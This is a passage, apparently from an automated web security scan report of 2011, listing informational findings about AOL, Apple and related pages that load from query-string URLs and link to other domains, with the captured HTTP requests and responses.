Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575117715-Repeat%7C1367647117715%3B%20s_nrgvo%3DRepeat%7C1367647117717%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:48 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-27.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2580
Set-Cookie: JSESSIONID=051B842D95CDBCB1C5B287D000D393DF; Path=/aol
Content-Length: 2580

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl12 plid-60422 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
img" name="om_dl12_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl12|sec1_lnk1|60422" href="http://news.travel.aol.com/2011/05/03/walt-disney-world-3-awesome-days-outside-the-parks/"><img height="217" alt="Disney" width="386" src="http://o.aolcdn.com/hss/storage/adam/3e43af495c5451bcd133636275a49d35/child-mickey-mouse-hat-disney-386nm050411.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl12_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl12|sec3_lnk2|60422" href="http://www.gadling.com/2011/05/03/gadlings-rankings-of-hotel-breakfast-buffet-foods/">Hotel Breakfast Buffet Items to Avoid
</a>
...[SNIP]...

16.24. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/272816/thumbs/a-LUCIA-386x217.jpg
  • http://portal.aolcdn.com/p5/forms/673/06fae224-ec89-4d40-9623-2a3cda346ffe.gif
  • http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575074532-Repeat%7C1367647074532%3B%20s_nrgvo%3DRepeat%7C1367647074536%3B; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2179
Set-Cookie: JSESSIONID=F67A64AB2ABBCCD3483C261F0DE136F5; Path=/aol
Connection: close
Content-Length: 2179

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-54848 display-lightbox">
<div id="advert">

...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|54848" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432"><span class="overlay">
...[SNIP]...
</b><img height="217" alt="Lucia" width="386" src="http://i.huffpost.com/gen/272816/thumbs/a-LUCIA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|54848">Go Back to School
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://pr.atwola.com/promoclk/100001736x1223226161x1201733088/aol?redir=http:%2F%2Fdegrees.classesusa.com%2Fschools%2F%3Fsourceid%3Dlmb%2D24092%2D45432" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|54848">See degrees now</a>
...[SNIP]...
<a id="dl-sponsorimg" class="icid-maing-grid7|main5|dl8|link4|54848"><img src="http://portal.aolcdn.com/p5/forms/673/06fae224-ec89-4d40-9623-2a3cda346ffe.gif"/></a>
...[SNIP]...

16.25. http://www.apple.com/itunes/affiliates/download/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/affiliates/download/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.apple.com/itunes/affiliates/download/?id=281704577
The response contains the following link to another domain:
  • http://fls.doubleclick.net/activityi;src=1566767;type=itune088;cat=apple465;ord=1;num=1?

Request

GET /itunes/affiliates/download/?id=281704577 HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/artist/aol-inc/id281704577
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D7B9FD85162B9C-600001848003F046[CE]; POD=us~en; ac_survey=1; ccl=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; geo=US; dfa_cookie=appleglobal%2Cappleitunes%2Cappleusitunesipod; s_pv=itunes%20-%20affiliates%20-%20download%20itunes%20(US); s_ppv=itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%2528US%2529; s_orientation=%5B%5BB%5D%5D; s_cc=true; s_ria=Flash%2010%7C; s_pathLength=itunes%3D1%2C; s_vnum_us=ch%3Ditunes%26vn%3D2%3Bch%3Dsupport%26vn%3D1%3B; s_invisit_us=itunes%3Dtrue%3B; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.14 (Unix)
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Thu, 05 May 2011 12:55:26 GMT
Date: Thu, 05 May 2011 12:45:26 GMT
Connection: close
Content-Length: 14466

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1566767;type=itune088;cat=apple465;ord=1;num=1?" width=1 height=1 frameborder=0></iframe>
...[SNIP]...

16.26. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30
The response contains the following link to another domain:
  • http://mapq.st/map?q='+listingStreet+' '+listingCity+' '+listingState+' '+listingZip+' ('+listingName+')&maptype=map

Request

GET /www.citysbest.com/include/citysbest-min.js?30 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 133951
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=856
Expires: Thu, 05 May 2011 01:12:59 GMT
Date: Thu, 05 May 2011 00:58:43 GMT
Connection: close
Content-Length: 133951

(function($){var defaultOptions={signupServiceUrl:'http://newsletter.sandbox.asylum.com/newsletter_signup.php',standalone:false,verify:true,site:'asylum',list:'main',template:'welcome',formClass:'aol-
...[SNIP]...
<div style="width:100px;padding-bottom:10px;">';htmlBody=htmlBody+'<a href="http://mapq.st/map?q='+listingStreet+' '+listingCity+' '+listingState+' '+listingZip+' ('+listingName+')&maptype=map" target="_blank" class="map-link">Get Directions &#187;</a>
...[SNIP]...

16.27. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.dailyfinance.com/include/dailyfinance.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198
The response contains the following links to other domains:
  • http://money.aol.com/
  • http://o.aolcdn.com/os/money/dailyfinance/css/aol.globalheader-1.1_df.png
  • http://quote-web.aol.com/?s='+ arrMNstocks[currentIndex].replace(/.*[:]/ig,
  • http://quote-web.aol.com/?s='+ mktsym +'&e='+ mktXch +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '
  • http://www.dailyfinance.com/

Request

GET /www.dailyfinance.com/include/dailyfinance.js?v=198 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 245796
Content-Type: application/javascript
Cache-Control: max-age=394
Expires: Thu, 05 May 2011 01:05:08 GMT
Date: Thu, 05 May 2011 00:58:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 245796

/* Rev:$Revision: 146709 $ */

// check for cookie containg user's live updates status.
var lvStatusInit = getCookie('AOL_StockQuotesLiveUpdate');
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi
...[SNIP]...
<a href="'+ chartsbaseurl +'/classic-charts?dr=999" onclick ="s_objectID=s_265.pageName + \' Market News Chart: Main Chart Clicked\';"><img src="http://quote-web.aol.com/?s='+ arrMNstocks[currentIndex].replace(/.*[:]/ig,"") +'&e='+ lvStocks[arrMNstocks[currentIndex]].x +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '" width="432" height="242" alt="Market News" border="0" /></a>
...[SNIP]...
<a href="'+ chartsbaseurl +'/classic-charts?dr=999" onclick ="s_objectID=s_265.pageName + \' Market News Chart: Main Chart Clicked\';"><img src="http://quote-web.aol.com/?s='+ mktsym +'&e='+ mktXch +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '" width="432" height="242" alt="Market News" border="0" /></a>
...[SNIP]...
<h4><a href="http://money.aol.com">';
moduleString += '">
...[SNIP]...
<h4><a href="http://money.aol.com">';
moduleString += '">
...[SNIP]...
<h2 title="DailyFinance"><a title="DailyFinance Main" href="http://www.dailyfinance.com/" class="_o0-0"><img src="http://o.aolcdn.com/os/money/dailyfinance/css/aol.globalheader-1.1_df.png" alt="Dailyfinance"/></a>
...[SNIP]...

16.28. http://www.citysbest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.citysbest.com/?icid=navbar_citysbest_main5
The response contains the following links to other domains:

Request

GET /?icid=navbar_citysbest_main5 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/
Content-Type: text/html
Content-Length: 15501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<!-- GLOBAL JQUERY INCLUDE HOTSPOT -->
       <script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4" type="text/javascript"></script>
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9"></script>        
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30"></script>        <!-- GLOBAL CB CSS INCLUDE HOTSPOT -->
       <link rel="stylesheet" href="http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css?63" media="all" />
       <!-- OMNITURE HOTSPOT -->
...[SNIP]...
<!-- ADS WRAPPER HOTSPOT -->
       <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div class="aol-logo clearfix"><a href="http://www.aol.com">AOL</a>
...[SNIP]...
<a href="/cleveland/news/2011/05/04/know-your-heroes-who-to-watch-for-during-avengers-filming/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/ironman_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/atlanta/news/2011/05/04/ashley-asks-atl-rapper-and-celebrity-apprentice-lil-jon/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/liljonapprentice_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/miami/news/2011/05/04/food-fight-philly-cheesesteak-face-off/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/woodys_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/austin/news/2011/05/04/weird-austin-deep-eddy/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/deepeddy_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/denver/news/2011/05/04/denver-concerts-5-hot-picks-for-this-weekend/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/tune_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/san-diego/news/2011/05/03/sexy-san-diego-what-is-s-d-style/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/blake-lively-in-a-bikini-in-vogue-issue-june-2010_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/chicago/news/2011/05/03/celebrate-the-2011-kentucky-derby-in-chicago/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/banamine-flickr_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/washington-dc/news/2011/05/03/the-best-spots-for-dining-outdoors-in-dc/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/brasseriebeckpatio-1304303119_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/los-angeles/news/2011/05/03/tequila-5-l-a-cocktails-none-margaritas/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/5244507744173bcc6cc3_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/new-york-city/news/2011/04/28/mom-and-the-city-5-mothers-day-activities-in-nyc/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/13.mcqueensp2010platosatlantis-1303942476_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<li class="first"><a href="http://corp.aol.com/">AOL Inc.</a>
...[SNIP]...
<li><a href="http://legal.aol.com/TOS">Updated Terms of Service</a>
...[SNIP]...
<li><a href="http://privacy.aol.com/">Updated Privacy Policy</a>
...[SNIP]...
<li class="last"><a href="http://adinfo.aol.com/about-our-ads/">About Our Ads</a>
...[SNIP]...
<li class="first"><a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
...[SNIP]...
<li><a href="http://help.aol.com/help/product/citys_best/">Help + Support</a>
...[SNIP]...
<li><a onclick = "return fBo('citysbest');" href="http://feedback.aol.com/rs/rs.php?sid=citysbest">Feedback</a>
...[SNIP]...

16.29. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.dailyfinance.com/?icid=navbar_finance_main5
The response contains the following links to other domains:

Request

GET /?icid=navbar_finance_main5 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
Content-Type: text/html
Content-Length: 126939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<head>
<script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- End datalayer-beacon module --> <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css" media="screen, projection" />
<script type="text/javascript" src="http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.min.js&amp;os=4" ></script>


<script type="text/javascript" src="http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198"></script>
...[SNIP]...
<li class="GH_hat_LI"><a href="http://www.aol.com" target="_blank"><span id="GH_hat_AOL_logo">
...[SNIP]...
<li class="GH_hat_LI"><a href="http://webmail.aol.com/?_AOLLOCAL=mail" class="GH_hat_A GH_hat_links_A" target="_blank">MAIL</a>
...[SNIP]...
<li><a href="http://www.walletpop.com/">WalletPop</a>
...[SNIP]...
<li><a href="http://www.luxist.com/">Luxist</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business</a>
...[SNIP]...
<strong>You may need to upgrade your Flash player by visiting this link <a href="http://www.adobe.com/go/getflashplayer/">http://www.adobe.com/go/getflashplayer/</a>
...[SNIP]...
<div class="imagedetail"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/jobsreport240.jpg"></img>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/survey-most-americans-underestimate-retirement-healthcare-costs/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/elderly_186x136.jpg" alt="" /></a>
...[SNIP]...
<h3>


<a href="http://www.walletpop.com/2011/05/04/reduce-gas-the-easy-way-try-bike-to-work-and-school-month/" target="_self" rel="bookmark">


Reduce Gas the Easy Way: Bike to Work, School</a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/reduce-gas-the-easy-way-try-bike-to-work-and-school-month/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/bikers240_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/tornado-flood-hurricane-quake-are-you-covered-for-a-worst-ca/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/tornado_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/dodgers-hit-a-home-run-with-free-tickets-for-service-members-ve/"><img hspace="4" border="1" class="photoRight" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/dodgers.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/dish-network-sued-over-free-starz-promotion/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/04/dish_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/nintendo-cuts-wii-prices-ahead-of-new-gaming-system-launch/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/1-wii_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/att-tmobile-buyout-fcc-doj-antitrust-investigation/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/03/atttmobile240_186x136.jpg" alt="" /></a>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_dfp_adsonar.js"></script>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'The White House said Wednesday that it was ready to start talks with Congress on a free trade deal with Colombia, setting the stage for lawmakers to move ahead on similar agreements with South Korea and Panama, as Republicans had demanded.')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/story/white-house-advances-us-colombia-trade/1626038">White House advances US-Colombia trade...</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'If you're a bank customer, you could soon be facing higher ATM fees, a $50 spending limit on your debit card, or a 30% late payment penalty on your credit card. And those debit rewards you've been enjoying? Say goodbye to those.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm?eref=aol">The wrath of the banks</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Aljolynn Sperber, a single mom in Los Angeles, says she can no longer afford to visit her family in Sacramento because of the cost of fuel.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm?eref=aol">Paying for gas forces painful sacrifices</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'When their mother died of cancer in June 2007, Pattie Cagney Sheehan and her four siblings inherited the Hinsdale, Ill., three-bedroom ranch where their parents had lived. Estimated value: just over $1 million.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm?eref=aol">Inheritance: How to handle a million-dollar...</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Grisha Stpanov opened a credit card, charged up $20,000, but never paid it back.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm?eref=aol">Anatomy of a $500,000 credit card fraud</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'It's probably safe to come out from under your desk now.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm?eref=aol">Put some punch into your career</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Apparently people don't like paying $5 to withdraw their own money from an ATM.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm?eref=aol">Goodbye, $5 ATM fees</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'If you're in the market to sell your home, you probably feel you can't catch a break. Nearly five years into the housing bust, when many experts thought the real estate market would at least have stabilized, sales and prices are still dropping in most of the country.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm?eref=aol">Your Home: How to sell in tough times</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Thinking of spending a weekend in Paris this spring? Think again.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm?eref=aol">Airline fees: The $500 surprise</a>
...[SNIP]...
<div class="feedsFooter">


<a target="_blank" href="http://money.cnn.com/index.html">More from CNNMoney</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/I61aGXv_tTw/"
target="_blank">
Top After-Hours Movers, Earnings & More (BMC, HNSN, IO, SLV, JDSU, KLIC, MELI, NWSA, SMSI)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/VchhDCUnw90/"
target="_blank">
Whole Foods Continues To Shine, Despite Revenue Mix (WFMI)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/xSPsy0oSRKQ/"
target="_blank">
Top Earnings Previews For Thursday (ARG, CTL, CVS, DMD, DTV, EP, KFT, PMI, PCLN, V)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/Gpc53FcN3fg/"
target="_blank">
Commodities Watch: Gold, Silver Sell-off Continues; US Now Net Exporter of Refined Oil Products; Coffee Prices Slide (GLD, SLV, SBUX, GMCR)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/xWo9SUG82MU/"
target="_blank">
POLL: No Dead Bin Laden Photo Release! Is It Fair?</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/dFlfepnKOeE/"
target="_blank">
Is Citi Worth $5.60? Or $56 Soon? (C, GS, BAC)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/-zb8Lq7x3zc/"
target="_blank">
Oil & Gas Hedging Woes, Devon Energy Falters With Chesapeake (DVN, CHK, APC, APA, OXY)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
